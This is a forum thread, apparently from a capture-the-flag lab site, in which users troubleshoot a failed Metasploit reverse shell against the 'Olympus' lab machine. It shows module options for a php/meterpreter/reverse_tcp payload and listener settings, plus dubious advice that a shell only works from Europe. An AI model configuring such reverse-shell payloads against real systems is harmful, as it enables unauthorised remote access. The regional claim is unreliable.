Olympus

@laylow said:

@sckull said:

@redsoc said:
I cannot get reverse shell using Metasploit for e.g. Olympus machine, where I’m very confident that should work. I’m running kali VirtualBox VM on Windows 7 host on laptop. I can ping and turned off windows firewall. I also tried to install everything fresh on desktop PC on Windows 10 with fresh kali VM. Did you experience similar problems or do you have any hint for me?

My ifconfig:

eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.x.x.x netmask 255.255.255.0 …

lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0 …

tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST> mtu 1500
inet 10.y.y.y netmask 255.255.254.0 destination 10.y.y.y …

It is very strange. Only one time I had meterpreter session. It was timed out. But now I can not get new session, despite all parameters are the same.
I use tun interface. What could be a problem in your opinion? It is very difficult to work if it is so unstable. I tried to exploit multiple times. Did set TARGET and set PAYLOAD and set LHOST again.
I reseted Olympus multiple times, but no luck – no session. But the same worked - only once. I cannot understand this.

Current status:
msf exploit(exploit) > exploit

[] Started reverse TCP handler on 10.y.y.y:4444
[
] Exploit completed, but no session was created.

msf exploit(exploit) > show options

Module options (exploit):

Name Current Setting Required Description


PATH / yes Path to target webapp
Proxies no A proxy chain of format type:host:port[,type:host:port][…]
RHOST 10.10.10.83 yes The target address
RPORT 80 yes The target port (TCP)
SRVHOST 10.y.y.y yes Callback host for accepting connections
SRVPORT 9000 yes Port to listen for the debugger
SSL false no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

Name Current Setting Required Description


LHOST 10.y.y.y yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port

Exploit target:

Id Name


0 Automatic

There must be something else to setup. E.g. there is a remark for LHOST “an interface may be specified”. Should I make: “setg interface tun0”? Or should I somehow clean up my Metasploit?

I try with that and differents things, but i can’t get a shell too.

too much spoiler here DUDE!!

but just tell the trues you will not get shell on this machine unless you europ simply put…

if you have and account with AWS then make linux instace and run DIffrent

XXXXX ploit to get the shell and things you need

hope i didn;t spoil any thing…

this machine wont get metaxploit if you are any where other then europ and if you in eurpe and you can not get shell then my be you making mistakes.

Hello brother, I am in asia, can i still get reverse shell using metasploit? because I am trying since yesterday, i am using the correct exploit, but still not getting reverse shell